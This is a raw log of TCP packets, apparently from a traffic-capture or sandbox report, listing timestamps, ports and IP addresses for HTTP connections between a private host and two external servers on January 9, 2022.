Jan 9, 2022 18:48:38.921113968 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.946974039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.947071075 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.967284918 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.979665995 CET	49857	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:39.076822042 CET	80	49856	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:39.158216000 CET	80	49857	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:39.158385038 CET	49857	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:39.158551931 CET	49857	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:39.158577919 CET	49857	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:39.180027962 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180102110 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180147886 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180190086 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180231094 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180237055 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.180272102 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180289984 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.180314064 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180355072 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180397034 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180409908 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.180437088 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180475950 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.180478096 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180519104 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180535078 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.180557966 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180598974 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180628061 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.180635929 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180677891 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180721045 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180723906 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.180759907 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180782080 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.180799961 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180840015 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180877924 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.180917978 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180958986 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.180964947 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.180999994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181039095 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181046009 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.181071997 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181113005 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181138039 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.181150913 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181191921 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181212902 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.181291103 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.181729078 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181771994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181813955 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181855917 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181886911 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.181896925 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181940079 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181981087 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.181982040 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.182019949 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182050943 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.182063103 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182101965 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182122946 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.182142973 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182182074 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182223082 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182255030 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.182262897 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182301998 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182341099 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182382107 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182399035 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.182420969 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182461023 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182471037 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.182499886 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182539940 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.182540894 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182581902 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182598114 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.182621002 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182660103 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182687998 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.182693005 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182732105 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182768106 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.182779074 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.182847977 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.336791992 CET	80	49857	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:39.442650080 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.442712069 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.442750931 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.442792892 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.442833900 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.442876101 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.442917109 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.442955971 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.442955017 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.442996979 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443011045 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443038940 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443078041 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443088055 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443119049 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443161011 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443164110 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443198919 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443219900 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443239927 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443279028 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443320036 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443321943 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443361044 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443401098 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443411112 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443442106 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443468094 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443483114 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443521023 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443531990 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443563938 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443603039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443619013 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443639994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443681002 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443711042 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443720102 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443764925 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443769932 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443808079 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443859100 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443859100 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443902016 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443942070 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.443962097 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.443979025 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444020033 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444022894 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.444058895 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444099903 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444140911 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444142103 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.444179058 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444221020 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444232941 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.444262981 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444293976 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.444302082 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444344997 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444360018 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.444381952 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444422960 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444446087 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.444463968 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444503069 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444529057 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.444545984 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444586039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444592953 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.444623947 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444664955 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444679976 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.444694042 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.444772959 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.445283890 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445322990 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445362091 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445403099 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445441961 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445455074 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.445483923 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445523024 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445523977 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.445563078 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445604086 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445641041 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.445642948 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445683956 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445723057 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.445724964 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445766926 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445795059 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.445806026 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445844889 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445854902 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.445887089 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445925951 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.445941925 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.445962906 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.446002960 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.446026087 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.446042061 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.446082115 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.446085930 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.446120977 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.446158886 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.446197987 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.446207047 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.446235895 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.446264029 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.446295977 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.446305990 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.446341991 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.446357965 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.446430922 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.483287096 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.483525038 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.485054016 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.486964941 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.487102985 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.488980055 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.491070032 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.491185904 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.491942883 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.494013071 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.494102955 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.495974064 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.497971058 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.498115063 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.499950886 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.500888109 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.501032114 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.502938986 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.504921913 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.505033016 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.506808996 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.548427105 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.706420898 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.706577063 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.706660032 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.706701994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.706742048 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.706782103 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.706821918 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.706851006 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.706860065 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.706903934 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.706943989 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.706962109 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.706984043 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707021952 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.707025051 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707063913 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707103968 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707144022 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707150936 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.707182884 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707221985 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707241058 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.707261086 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707302094 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707304001 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.707341909 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707362890 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.707380056 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707420111 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707456112 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.707458973 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707499027 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707532883 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707547903 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.707573891 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707609892 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.707609892 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.707669973 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.708184958 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708334923 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708445072 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.708518028 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708559036 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708597898 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708636045 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708677053 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708704948 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.708715916 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708756924 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708765984 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.708797932 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708834887 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708908081 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708951950 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.708951950 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.708991051 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709007025 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.709029913 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709070921 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709075928 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.709110975 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709148884 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.709151983 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709192991 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709229946 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709237099 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.709269047 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709307909 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709345102 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709357023 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.709386110 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709417105 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709434032 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.709456921 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709496975 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709523916 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.709533930 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709574938 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709614038 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.709615946 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.709692001 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.713701010 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.713747025 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.713785887 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.713825941 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.713862896 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.713912010 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.713922024 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.713953018 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.713987112 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.713990927 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714032888 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714047909 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714072943 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714111090 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714112997 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714150906 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714190006 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714212894 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714230061 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714270115 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714278936 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714308977 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714345932 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714349985 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714390993 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714427948 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714447975 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714467049 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714507103 CET	80	49854	211.169.6.249	192.168.2.3
